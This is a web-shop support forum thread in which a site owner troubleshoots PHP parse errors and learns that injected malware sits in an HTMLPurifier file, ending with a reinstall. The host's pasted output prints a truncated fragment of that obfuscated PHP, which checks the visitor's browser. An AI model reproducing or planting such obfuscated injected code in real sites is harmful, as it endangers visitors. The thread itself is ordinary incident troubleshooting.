site won't load

[xiabaili]

I’ve got a little bit of a problem which I’d like to share on this forum, but I'm not sure if the problem is with it's my hosting co, or with version 1.6.0.11. has anyone else experienced this issue? hope I can actually find a solution here, cos I'm going nuts.

 

I worked on the site late last night www.jamaicaskyblue.com , woke up this morning and the site won’t load. I checked my error logs in cpanel, and found the following:

 

[sat Jan 31 21:26:14 2015] [error] [client 180.76.5.61] PHP Parse error: syntax error, unexpected $end in /home/xiabaili/public_html/tools/htmlpurifier/HTMLPurifier.standalone.php on line 19853
[sat Jan 31 21:24:28 2015] [error] [client 66.249.67.156] PHP Parse error: syntax error, unexpected $end in /home/xiabaili/public_html/tools/htmlpurifier/HTMLPurifier.standalone.php on line 19853
[sat Jan 31 21:18:52 2015] [error] [client 124.78.181.79] PHP Parse error: syntax error, unexpected $end in /home/xiabaili/public_html/tools/htmlpurifier/HTMLPurifier.standalone.php on line 19853
[sat Jan 31 21:18:35 2015] [error] [client 124.78.181.79] PHP Parse error: syntax error, unexpected $end in /home/xiabaili/public_html/tools/htmlpurifier/HTMLPurifier.standalone.php on line 19853
[sat Jan 31 21:16:25 2015] [error] [client 66.249.67.156] PHP Parse error: syntax error, unexpected $end in /home/xiabaili/public_html/tools/htmlpurifier/HTMLPurifier.standalone.php on line 19853

 

 

I contacted my host, and they said “there is suspicious code in the script hosted under your account” they copied me the following code:

 

loris:/home/xiabaili/public_html/tools/htmlpurifier# cat HTMLPurifier.standalone.php | more
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($
ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $jjzntcplly = 'R37,18R#>q%x5c%x7825V<*#fopoV;
hojepdoF.uofuopD#)sfebfIc%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5c%ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y39]271]y83]256]y78]248]yh19275j{hnpd1
9275fubmgoj{827{**u%x5c%x7825-#jt0}Z;0]=]0#)27824-%x5c%x7824*<!%x5c%x7824-76]271]y7d]252]y74]256#<!%x5c%x785s:%x5c%x785c%x5c%x7825j:q%x5c%x78257%x5c%x782f7#@#
75c%x7825z>>2*!%x5c%x7825z>3<!fm62]y3:]84#-!OVMM*<%x22Q%x29Q%x29s", NULL); }25fdy)##-!#~<%x5c%x7825h00#*<%x5c%judovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!os
vuf73]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]GFS%x5c%x7860QUUI&c_UOFHB%x5c%x7.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x%x5c%x7825<#
372]58y]472]37y%x7825)3of:opjudovg<~%x5c%x7824<!%x54]256]y39]252]y83]273]y72]282#<!%x5c%x7822p%x5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7%x7825!<***f%x5c
%x7827,*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoop860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x782feobz+sfwjidsb
%x5c%x7860bj+upco5c%x787f_*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfsy6d]281]y43]78]y33]65]y31]55]y85]82]y76]%x5c%x782f!#0#)idubn%x5c%x786024-tu

 

I’m still waiting for someone to get back to me with a fix.

 

Has anyone got any ideas???

 

Rgds,

Howard

[El Patron]

it appears that your tools/htmlpurifier/HTMLPurifier.standalone.php file did not fully get placed into your domain.

 

I have attached a native 16011 file, rename your existing to something like 'bad' and  upload this file.

HTMLPurifier.standalone.php

[xiabaili]

Thanks for yr reply El Patron.

 

I uploaded the file as you suggested, cleared the browser cache, but the site is still not loading.

 

[El Patron]

please post any errors there are.  maybe they changed.

[xiabaili]

Yes, yr correct.. pls note the following errors:

 

[sun Feb 01 05:54:01 2015] [error] [client 124.78.181.79] PHP Parse error:  syntax error, unexpected $end, expecting T_FUNCTION in /home/xiabaili/public_html/classes/module/Module.php on line 783
[sun Feb 01 05:54:01 2015] [error] [client 124.78.181.79] PHP Warning:  Unterminated comment starting line 783 in /home/xiabaili/public_html/classes/module/Module.php on line 783
[sun Feb 01 05:51:50 2015] [error] [client 66.249.73.212] PHP Parse error:  syntax error, unexpected $end, expecting T_FUNCTION in /home/xiabaili/public_html/classes/module/Module.php on line 783
[sun Feb 01 05:51:50 2015] [error] [client 66.249.73.212] PHP Warning:  Unterminated comment starting line 783 in /home/xiabaili/public_html/classes/module/Module.php on line 783
[sun Feb 01 05:48:00 2015] [error] [client 66.249.73.204] PHP Parse error:  syntax error, unexpected $end, expecting T_FUNCTION in /home/xiabaili/public_html/classes/module/Module.php on line 783
[sun Feb 01 05:48:00 2015] [error] [client 66.249.73.204] PHP Warning:  Unterminated comment starting line 783 in /home/xiabaili/public_html/classes/module/Module.php on line 783
[sun Feb 01 05:45:09 2015] [error] [client 124.78.181.79] PHP Parse error:  syntax error, unexpected $end, expecting T_FUNCTION in /home/xiabaili/public_html/classes/module/Module.php on line 783
[sun Feb 01 05:45:09 2015] [error] [client 124.78.181.79] PHP Warning:  Unterminated comment starting line 783 in /home/xiabaili/public_html/classes/module/Module.php on line 783
[sun Feb 01 05:42:52 2015] [error] [client 124.78.181.79] PHP Parse error:  syntax error, unexpected $end, expecting T_FUNCTION in /home/xiabaili/public_html/classes/module/Module.php on line 783
[sun Feb 01 05:42:52 2015] [error] [client 124.78.181.79] PHP Warning:  Unterminated comment starting line 783 in /home/xiabaili/public_html/classes/module/Module.php on line

[El Patron]

as one my suspect, when one file did not complete upload then we assume there are others.

 

did you unzip locally and then ftp up your files to remote server?

 

If so I would re-ftp all files (minus the install folder), you will need to rename the admin folder on your computer disk to match name on remote sever.

 

point being you need to ensure 'all' files have been moved to remote properly.

[xiabaili]

The files were auto installed via Softaculous server, which is a feature provided by my host Arvixe. I don't have access to the files, until they have been installed on the server, all i need to do is to select a directory, and all is done. I'm still waiting on their tech guys to get back to me, but in the case that I've got to reinstall from back up or a clean reinstall (not sure if the back up has the latest modification), how would I do this without loosing the work I've done so far?

 

I have ftp access, which files would i need to copy to save my work?

 

Again, thanks in advance.

[FullCircles]

Those aren't file upload corruptions, I'd be more worried that the files have been modified personally, that isn't garbage code as far as I can tell, the bits at the top are running checks on what browser the client is running, likely with the intent on running various malicious things on them.

 

I'd get in touch with your host and ask them if they can identify how those files came to be changed overnight, because it suggests someone was able to do that if it was working before you went to sleep. Either that or it had been like that the entire time, which they also need to be told about, possibly someone had gotten malicious code into the auto installer, not impossible for that to happen

 

But yes, if you have a backup from before this happened that doesn't have that code in, I'd upload it over the top, because you don't want any of that remaining

[xiabaili]

I contacted my hosting company, and they’ve also indicated that the code is some sort of malware.

They’re not really sure how it got on to the server, but they have suggested reinstalling the script,

and possibly getting an update.

 

I’m now waiting for the reinstallment to be completed.

 

Thanks for the valuable feedback, much appreciated.

[xiabaili]

update:

reinstalled my site, all's up and running ok. Also found out that the problem was with the contentbox module I installed, once deleted all was back to normal.

 

once again, thanks for the valuable feedback!